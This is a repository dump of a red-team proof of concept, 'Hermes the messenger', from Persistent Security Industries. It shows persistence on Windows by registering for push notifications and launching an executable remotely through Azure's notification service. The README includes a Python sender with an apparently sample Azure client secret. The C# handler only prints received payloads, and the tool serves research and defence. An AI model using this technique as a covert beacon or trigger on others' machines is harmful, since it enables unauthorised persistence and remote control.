├── .gitignore ├── README.md ├── hermes.sln └── hermes ├── Program.cs ├── Properties └── launchSettings.json ├── app.manifest └── hermes.csproj /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.tlog 94 | 
*.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure 
Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. 
Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio 6 auto-generated project file (contains which files were open etc.) 
298 | *.vbp 299 | 300 | # Visual Studio 6 workspace and project file (working project files containing files to include in project) 301 | *.dsw 302 | *.dsp 303 | 304 | # Visual Studio 6 technical files 305 | *.ncb 306 | *.aps 307 | 308 | # Visual Studio LightSwitch build output 309 | **/*.HTMLClient/GeneratedArtifacts 310 | **/*.DesktopClient/GeneratedArtifacts 311 | **/*.DesktopClient/ModelManifest.xml 312 | **/*.Server/GeneratedArtifacts 313 | **/*.Server/ModelManifest.xml 314 | _Pvt_Extensions 315 | 316 | # Paket dependency manager 317 | .paket/paket.exe 318 | paket-files/ 319 | 320 | # FAKE - F# Make 321 | .fake/ 322 | 323 | # CodeRush personal settings 324 | .cr/personal 325 | 326 | # Python Tools for Visual Studio (PTVS) 327 | __pycache__/ 328 | *.pyc 329 | 330 | # Cake - Uncomment if you are using it 331 | # tools/** 332 | # !tools/packages.config 333 | 334 | # Tabs Studio 335 | *.tss 336 | 337 | # Telerik's JustMock configuration file 338 | *.jmconfig 339 | 340 | # BizTalk build output 341 | *.btp.cs 342 | *.btm.cs 343 | *.odx.cs 344 | *.xsd.cs 345 | 346 | # OpenCover UI analysis results 347 | OpenCover/ 348 | 349 | # Azure Stream Analytics local run output 350 | ASALocalRun/ 351 | 352 | # MSBuild Binary and Structured Log 353 | *.binlog 354 | 355 | # NVidia Nsight GPU debugger configuration file 356 | *.nvuser 357 | 358 | # MFractors (Xamarin productivity tool) working folder 359 | .mfractor/ 360 | 361 | # Local History for Visual Studio 362 | .localhistory/ 363 | 364 | # Visual Studio History (VSHistory) files 365 | .vshistory/ 366 | 367 | # BeatPulse healthcheck temp database 368 | healthchecksdb 369 | 370 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 371 | MigrationBackup/ 372 | 373 | # Ionide (cross platform F# VS Code tools) working folder 374 | .ionide/ 375 | 376 | # Fody - auto-generated XML schema 377 | FodyWeavers.xsd 378 | 379 | # VS Code files for those working on multiple tools 380 | .vscode/* 381 | 
!.vscode/settings.json 382 | !.vscode/tasks.json 383 | !.vscode/launch.json 384 | !.vscode/extensions.json 385 | *.code-workspace 386 | 387 | # Local History for Visual Studio Code 388 | .history/ 389 | 390 | # Windows Installer files from build outputs 391 | *.cab 392 | *.msi 393 | *.msix 394 | *.msm 395 | *.msp 396 | 397 | # JetBrains Rider 398 | *.sln.iml 399 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hermes the messenger 2 | A PoC for achieving persistence via push notifications on Windows 3 | 4 | For more technical details and background, read our blog post here: https://www.persistent-security.net/post/beacon-on-demand-abusing-push-notifications-for-persistence 5 | 6 | 7 | 8 | # Usage 9 | 10 | Before anything else you need to [set up Azure](https://learn.microsoft.com/en-us/windows/apps/windows-app-sdk/notifications/push-notifications/push-quickstart#step-1-create-an-aad-app-registration). You then need to run the executable once so that it registers itself for push notifications. The only argument you need to pass is the object id of your Azure app; if all goes well, it will print the channel Uri it received from Microsoft. At that stage you may close the app. 11 | 12 | ``` 13 | hermes.exe <object-id> 14 | ``` 15 | 16 | If Windows App SDK 1.3 is not installed, the binary will attempt to download and deploy it along with the necessary extensions, using the redistributable URLs hard-coded in `Program.cs`. 
17 | 18 | When you have the channel Uri, you can attempt to spawn your executable remotely from another machine by calling the notification API with your tenant's details, and watch the magic happen: 19 | 20 | ```python 21 | import requests 22 | 23 | secret = "4r8Q~XW6U_PmJYg6Eu_jV22DWlsnhyJBIrdpV" 24 | app_id = "CA899E11-71CF-4DB3-962C-0EA65151C132" #not the object id but the Azure app id 25 | tenant_id = "E83F2382-F012-475A-9A4C-30545F429FB7" 26 | channel_uri = "https://wns2-am3p.notify.windows.com/?token=AwYAAAAiYI4p...." 27 | 28 | def send_notification(secret, app_id, tenant_id, channel_uri, notification_data): 29 | # Acquire token 30 | url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token" 31 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 32 | data = { 33 | 'grant_type': 'client_credentials', 34 | 'client_id': app_id, 35 | 'client_secret': secret, 36 | 'scope': 'https://wns.windows.com/.default' 37 | } 38 | response = requests.post(url, headers=headers, data=data) 39 | response_json = response.json() 40 | token = response_json['access_token'] 41 | 42 | # Send notification 43 | headers = { 44 | 'Content-Type': 'application/octet-stream', 45 | 'Authorization': f'Bearer {token}', 46 | 'X-WNS-Type': 'wns/raw', 47 | } 48 | response = requests.post(channel_uri, headers=headers, data=notification_data) 49 | return response.status_code, response.text 50 | 51 | 52 | send_notification(secret, app_id, tenant_id, channel_uri, "This is a notification") 53 | ``` 54 | 55 | # Demo 56 | 57 | 58 | 59 | https://github.com/persistent-security/hermes-the-messenger/assets/134269747/1de3afdc-79dc-4de6-827b-6acba44f910b 60 | 61 | -------------------------------------------------------------------------------- /hermes.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.5.33516.290 5 | 
MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{9A19103F-16F7-4668-BE54-9A1E7A4F7556}") = "hermes", "hermes\hermes.csproj", "{C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Release|Any CPU = Release|Any CPU 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Debug|x64.ActiveCfg = Debug|x64 19 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Debug|x64.Build.0 = Debug|x64 20 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Release|x64.ActiveCfg = Release|x64 23 | {C41C19DA-B8FF-49E2-A30D-9BE1F930EAA3}.Release|x64.Build.0 = Release|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {0BC99F31-52EF-4835-BDEA-05BCBEA36B6A} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /hermes/Program.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Windows.PushNotifications; 2 | using Microsoft.Windows.ApplicationModel.DynamicDependency; 3 | using Windows.Management.Deployment; 4 | using System.Runtime.InteropServices; 5 | using Microsoft.Win32.SafeHandles; 6 | using System.IO.Compression; 7 | using Microsoft.Windows.AppLifecycle; 8 | using WinRT; 9 | using System.Text; 10 | using Windows.ApplicationModel.Activation; 11 | 12 
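namespace hermes
{
    /// <summary>
    /// Console host for the push-notification persistence proof of concept.
    /// </summary>
    /// <remarks>
    /// What this file does, in the order a defender would observe it:
    /// an HTTPS download of the Windows App SDK redistributable zip (only when the
    /// runtime pieces are missing), installation of the contained MSIX packages via
    /// <c>PackageManager.AddPackageAsync</c>, a <c>LoadLibrary</c> of
    /// <c>Microsoft.WindowsAppRuntime.Bootstrap.dll</c> from the framework package
    /// directory, and finally <c>PushNotificationManager.Register</c> plus
    /// <c>CreateChannelAsync</c>. When the process is later activated with
    /// <c>ExtendedActivationKind.Push</c>, the raw payload is handed to
    /// <see cref="DoSomething"/>.
    /// </remarks>
    internal class Program
    {
        static readonly string _VERSION_ = "1.0.0";

        // Package family names of the framework packages this tool knows about.
        private const string Runtime13Family = "Microsoft.WindowsAppRuntime.1.3_8wekyb3d8bbwe";
        private const string Runtime12Family = "Microsoft.WindowsAppRuntime.1.2_8wekyb3d8bbwe";
        private const string BootstrapDllName = "Microsoft.WindowsAppRuntime.Bootstrap.dll";

        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(SafeLibraryHandle hModule, String procname);

        [DllImport("kernel32", CharSet = CharSet.Auto, BestFitMapping = false, SetLastError = true)]
        public static extern SafeLibraryHandle LoadLibrary(string fileName);

        // Managed signature used for the "MddBootstrapInitialize2" export that Init() resolves.
        // NOTE(review): the delegate is named ...Initialize3 but is bound to the ...Initialize2
        // export; only null is ever passed for versionTag, so string marshalling is not exercised.
        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
        delegate int MddBootstrapInitialize3(uint majorMinorVersion, string versionTag, PackageVersion packageVersion, Bootstrap.InitializeOptions options);
        private static MddBootstrapInitialize3 InitBootstrap;

        // Keeps the bootstrap module loaded for the life of the process. Without a rooted
        // reference the SafeHandle finalizer could call FreeLibrary while InitBootstrap
        // still points into the module.
        private static SafeLibraryHandle _bootstrapLibrary;

        private static readonly string SDK12URL = "https://aka.ms/windowsappsdk/1.2/1.2.230313.1/Microsoft.WindowsAppRuntime.Redist.1.2.zip";
        private static readonly string SDK13URL = "https://aka.ms/windowsappsdk/1.3/1.3.230502000/Microsoft.WindowsAppRuntime.Redist.1.3.zip";

        private static Guid azureAppGuid;

        /// <summary>
        /// Entry point. Ensures the Windows App SDK runtime is usable, then either registers
        /// for push notifications (command-line / launch activation) or handles a received
        /// push payload (push activation).
        /// </summary>
        static async Task Main()
        {
            Console.WriteLine("|-----------------------------------------------|");
            Console.WriteLine("| Persistent Security Industries GmbH |");
            Console.WriteLine($"| Persistence via push notifications PoC v{_VERSION_} |");
            Console.WriteLine("|-----------------------------------------------|\n");

            if (!await CheckDependenciesAsync())
            {
                // Failure messages use the "[-]" prefix like the rest of the file.
                Console.WriteLine("[-] Dependencies failed.");
                return;
            }

            if (!PushNotificationManager.IsSupported())
            {
                Console.WriteLine("[-] Push notifications are not supported.");
                return;
            }
            Console.WriteLine("[+] Push notifications are supported.");

            var activationArguments = AppInstance.GetCurrent().GetActivatedEventArgs();
            string lastArg;

            switch (activationArguments.Kind)
            {
                case ExtendedActivationKind.CommandLineLaunch:
                    var commandLineArgs = activationArguments.Data.As<ICommandLineActivatedEventArgs>();
                    // The object id is expected as the last whitespace-separated token.
                    lastArg = commandLineArgs.Operation.Arguments.Split().Last().Replace("\"", "");
                    break;

                case ExtendedActivationKind.Launch:
                    var launchArgs = activationArguments.Data.As<ILaunchActivatedEventArgs>();
                    lastArg = launchArgs.Arguments.Split().Last().Replace("\"", "");
                    break;

                case ExtendedActivationKind.Push:
                    PushNotificationReceivedEventArgs pushArgs = activationArguments.Data.As<PushNotificationReceivedEventArgs>();
                    var deferral = pushArgs.GetDeferral();
                    try
                    {
                        var notificationPayload = Encoding.UTF8.GetString(pushArgs.Payload);
                        DoSomething(notificationPayload);
                        Console.WriteLine("Press any key to exit");
                        Console.ReadKey();
                    }
                    finally
                    {
                        // Always release the deferral, even if handling the payload throws.
                        deferral.Complete();
                    }
                    return;

                default:
                    Console.WriteLine("[-] Invalid activation event");
                    return;
            }

            if (!Guid.TryParse(lastArg, out azureAppGuid))
            {
                Console.WriteLine("[-] Invalid Guid. Enter a valid Object Id.");
                Console.WriteLine("Usage: hermes.exe <object-id>");
                return;
            }
            Console.WriteLine($"[+] Using object (app) id: {azureAppGuid}");

            try
            {
                var manager = PushNotificationManager.Default;
                manager.Register();

                var ch = await manager.CreateChannelAsync(azureAppGuid);

                Console.WriteLine("\n" + ch.Channel.Uri);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.ToString());
            }
            Console.WriteLine("Press any key to exit");
            Console.ReadKey(true);
            // The bootstrapper is intentionally not shut down here (the original left
            // MddBootstrapShutdown() commented out).
        }

        /// <summary>
        /// Loads the Windows App SDK bootstrap DLL from <paramref name="bootstrapPath"/> and
        /// initializes the first SDK version (1.3, 1.2, 1.1) that the bootstrapper accepts.
        /// </summary>
        /// <param name="bootstrapPath">Directory that contains the bootstrap DLL.</param>
        /// <returns><c>true</c> when one version initialized; otherwise <c>false</c>.</returns>
        static bool Init(string bootstrapPath)
        {
            uint[] versions = { 0x00010003, 0x00010002, 0x00010001 };
            string bootstrapDll = Path.Combine(bootstrapPath, BootstrapDllName);
            Console.WriteLine("[+] Loading bootstrap dll from: " + bootstrapDll);

            var h = LoadLibrary(bootstrapDll);

            // Check the handle before using it, and read the last error right after the
            // failing call so a later P/Invoke cannot overwrite it.
            if (h == null || h.IsInvalid)
            {
                int hr = Marshal.GetHRForLastWin32Error();
                Console.WriteLine($"[-] Bootstrap DLL not loaded correctly (HRESULT 0x{hr:X8})");
                h?.Dispose();
                return false;
            }
            Console.WriteLine("[+] Bootstrap DLL loaded correctly");

            var addr = GetProcAddress(h, "MddBootstrapInitialize2");
            if (addr == IntPtr.Zero)
            {
                Console.WriteLine("[-] MddBootstrapInitialize2 was not found");
                h.Dispose();
                return false;
            }

            _bootstrapLibrary = h;
            InitBootstrap = (MddBootstrapInitialize3)Marshal.GetDelegateForFunctionPointer(addr, typeof(MddBootstrapInitialize3));

            foreach (uint version in versions)
            {
                try
                {
                    Marshal.ThrowExceptionForHR(InitBootstrap(version, null, default, Bootstrap.InitializeOptions.None));
                    Console.WriteLine($"[+] Initialized SDK Version 0x{version:X}");
                    return true;
                }
                catch (Exception ex)
                {
                    // A failed version is reported and the next (older) one is tried.
                    Console.WriteLine(ex.ToString());
                }
            }
            return false;
        }

        /// <summary>
        /// Downloads a Windows App SDK redistributable zip and installs the selected x64
        /// MSIX packages from it.
        /// </summary>
        /// <param name="url">HTTPS URL of the redistributable zip.</param>
        /// <param name="runtime">Install every package whose name starts with Microsoft.WindowsAppRuntime.</param>
        /// <param name="main_">Install the Main package.</param>
        /// <param name="ddl">Install the DDLM package.</param>
        /// <param name="singleton">Install the Singleton package.</param>
        /// <returns>
        /// <c>false</c> when the download or archive handling failed; otherwise <c>true</c>.
        /// A failure of an individual package is printed and does not change the result.
        /// </returns>
        static async Task<bool> InstallPackageAsync(string url, bool runtime = false, bool main_ = false, bool ddl = false, bool singleton = false)
        {
            var packageUri = new Uri(url);
            var packageManager = new PackageManager();

            var webProxy = new System.Net.WebProxy
            {
                UseDefaultCredentials = true,
                Address = HttpClient.DefaultProxy.GetProxy(packageUri)
            };

            try
            {
                // Server certificate validation is left at the platform default. The bytes
                // fetched here are installed as packages, so the TLS chain must be verified.
                using var httpClientHandler = new HttpClientHandler { Proxy = webProxy };
                using var client = new HttpClient(httpClientHandler);

                var data = await client.GetByteArrayAsync(url);

                using var memoryStream = new MemoryStream(data);
                using var archive = new ZipArchive(memoryStream);

                foreach (var entry in archive.Entries)
                {
                    bool isX64Msix =
                        entry.FullName.StartsWith("MSIX/win10-x64", StringComparison.OrdinalIgnoreCase) &&
                        entry.FullName.EndsWith(".msix", StringComparison.OrdinalIgnoreCase);
                    if (!isX64Msix)
                    {
                        continue;
                    }

                    bool wanted =
                        (runtime && entry.Name.StartsWith("Microsoft.WindowsAppRuntime", StringComparison.Ordinal)) ||
                        (main_ && entry.Name.StartsWith("Microsoft.WindowsAppRuntime.Main", StringComparison.Ordinal)) ||
                        (ddl && entry.Name.StartsWith("Microsoft.WindowsAppRuntime.DDLM", StringComparison.Ordinal)) ||
                        (singleton && entry.Name.StartsWith("Microsoft.WindowsAppRuntime.Singleton", StringComparison.Ordinal));
                    if (!wanted)
                    {
                        continue;
                    }

                    Console.WriteLine($"[+] Installing {entry.FullName}");

                    // A random name under the temp directory; nothing from the archive is used
                    // in the path. (Path.GetTempFileName() would also create a stray 0-byte
                    // .tmp file that was never cleaned up.)
                    var tempFilePath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName() + ".msix");

                    try
                    {
                        // CreateNew refuses to write through a file that already exists.
                        using (var fileStream = new FileStream(tempFilePath, FileMode.CreateNew, FileAccess.Write, FileShare.None))
                        using (var entryStream = entry.Open())
                        {
                            await entryStream.CopyToAsync(fileStream);
                        }

                        var deploymentOperation = await packageManager.AddPackageAsync(new Uri(tempFilePath), null, DeploymentOptions.None);

                        Console.WriteLine($"[+] Package installed: {deploymentOperation.IsRegistered}");
                    }
                    catch (Exception ex)
                    {
                        // Report and move on to the next package.
                        Console.WriteLine(ex.Message);
                    }
                    finally
                    {
                        File.Delete(tempFilePath);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.Message);
                return false;
            }
            return true;
        }

        /// <summary>
        /// Returns the installed x64 Windows App Runtime 1.3 framework packages for the
        /// current user.
        /// </summary>
        static Windows.ApplicationModel.Package[] GetAppRuntimeVersions()
        {
            var packageManager = new PackageManager();
            var frameworks = new List<Windows.ApplicationModel.Package>();

            foreach (var package in packageManager.FindPackagesForUser(string.Empty))
            {
                // Only SDK 1.3 is searched for now; the original author found it more
                // reliable than also accepting the 1.2 family.
                if (package.Id.FamilyName == Runtime13Family && package.Id.Architecture == Windows.System.ProcessorArchitecture.X64)
                {
                    Console.WriteLine($"[+] Found {package.Id.FamilyName}");
                    frameworks.Add(package);
                }
            }

            return frameworks.ToArray();
        }

        /// <summary>
        /// Verifies that a framework package plus its DDLM and Singleton companions are
        /// installed, deploying missing pieces, and initializes the bootstrapper.
        /// </summary>
        /// <returns><c>true</c> when the runtime is considered ready; otherwise <c>false</c>.</returns>
        static async Task<bool> CheckDependenciesAsync()
        {
            bool foundDDL12 = false;
            bool foundSingleton12 = false;
            bool foundDDL13 = false;
            bool foundSingleton13 = false;
            Windows.ApplicationModel.Package[] frameworks = GetAppRuntimeVersions();

            if (frameworks.Length == 0)
            {
                Console.WriteLine("[-] No compatible frameworks are installed. Attempting to deploy one.");
                // NOTE(review): this path returns without calling Init(); whether the
                // bootstrapper is usable afterwards is not visible from this file.
                return await InstallPackageAsync(SDK13URL, true, true, true, true);
            }

            var packageManager = new PackageManager();

            foreach (var package in packageManager.FindPackagesForUser(string.Empty))
            {
                if (package.Id.Architecture != Windows.System.ProcessorArchitecture.X64)
                {
                    continue;
                }

                bool isDdlm = package.Id.FamilyName.StartsWith("Microsoft.WinAppRuntime.DDLM", StringComparison.Ordinal);
                bool isSingleton = package.Id.FamilyName.StartsWith("MicrosoftCorporationII.WinAppRuntime.Singleton", StringComparison.Ordinal);
                if (!isDdlm && !isSingleton)
                {
                    continue;
                }

                foreach (var framework in frameworks)
                {
                    foreach (var dependency in package.Dependencies)
                    {
                        if (dependency.Id.FamilyName != framework.Id.FamilyName)
                        {
                            continue;
                        }

                        if (framework.Id.FamilyName == Runtime13Family)
                        {
                            if (isDdlm)
                            {
                                foundDDL13 = true;
                                Console.WriteLine("[+] DDL 1.3 is already installed.");
                            }
                            else
                            {
                                foundSingleton13 = true;
                                Console.WriteLine("[+] Singleton 1.3 is already installed.");
                            }
                        }
                        else if (framework.Id.FamilyName == Runtime12Family)
                        {
                            if (isDdlm)
                            {
                                foundDDL12 = true;
                                Console.WriteLine("[+] DDL 1.2 is already installed.");
                            }
                            else
                            {
                                foundSingleton12 = true;
                                Console.WriteLine("[+] Singleton 1.2 is already installed.");
                            }
                        }
                    }
                }
            }

            bool complete13 = foundDDL13 && foundSingleton13;
            bool complete12 = foundDDL12 && foundSingleton12;

            if (complete12 || complete13)
            {
                // Printed from the string so the output does not depend on the current
                // culture's decimal separator.
                string version = complete13 ? "1.3" : "1.2";
                Console.WriteLine($"[+] Found compatible framework version {version}");

                foreach (var framework in frameworks)
                {
                    if (framework.Id.FamilyName.Contains(version, StringComparison.Ordinal))
                    {
                        return Init(framework.InstalledPath);
                    }
                }
            }

            // A framework exists but a companion package is missing: install only the
            // missing pieces for that framework's SDK version, then initialize.
            foreach (var framework in frameworks)
            {
                if (framework.Id.FamilyName.Contains("1.2", StringComparison.Ordinal))
                {
                    await InstallPackageAsync(SDK12URL, false, false, !foundDDL12, !foundSingleton12);
                    return Init(framework.InstalledPath);
                }

                if (framework.Id.FamilyName.Contains("1.3", StringComparison.Ordinal))
                {
                    await InstallPackageAsync(SDK13URL, false, false, !foundDDL13, !foundSingleton13);
                    return Init(framework.InstalledPath);
                }
            }

            return false;
        }

        /// <summary>
        /// Handles the payload of a received raw push notification. In this PoC the text is
        /// only written to the console.
        /// </summary>
        /// <param name="payload">
        /// UTF-8 decoded notification body. It is chosen by whoever sends the notification,
        /// so it must be treated as untrusted input.
        /// </param>
        static void DoSomething(string payload)
        {
            Console.WriteLine($"[+] Received push notification content in the background: \n\n{payload}\n");
        }
    }

    /// <summary>
    /// SafeHandle wrapper for a module handle returned by LoadLibrary; releases it with
    /// FreeLibrary.
    /// </summary>
    sealed class SafeLibraryHandle : SafeHandleZeroOrMinusOneIsInvalid
    {
        [DllImport("kernel32", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        public static extern bool FreeLibrary(IntPtr hModule);

        // Only the interop marshaller creates instances; the handle is owned by this object.
        private SafeLibraryHandle() : base(true) { }

        /// <summary>Frees the wrapped module handle.</summary>
        protected override bool ReleaseHandle()
        {
            return FreeLibrary(handle);
        }
    }
}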
48 | 54 | 62 | 63 | 64 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /hermes/hermes.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Exe 5 | net6.0-windows10.0.19041.0 6 | enable 7 | enable 8 | app.manifest 9 | 10 | AnyCPU;x64 11 | 10.0.19041.0 12 | 13 | 14 | 15 | true 16 | 17 | 18 | 19 | 10 20 | true 21 | 10.0.19041.0 22 | 23 | 24 | 25 | 26 | CppwinrtComponent; 27 | Microsoft.Windows.PushNotifications; 28 | Microsoft.Windows.ApplicationModel.DynamicDependency; 29 | Windows.Management.Deployment; 30 | Microsoft.Windows.ApplicationModel; 31 | Microsoft.Windows.ApplicationModel.WindowsAppRuntime; 32 | Windows.Foundation; 33 | 34 | True 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | --------------------------------------------------------------------------------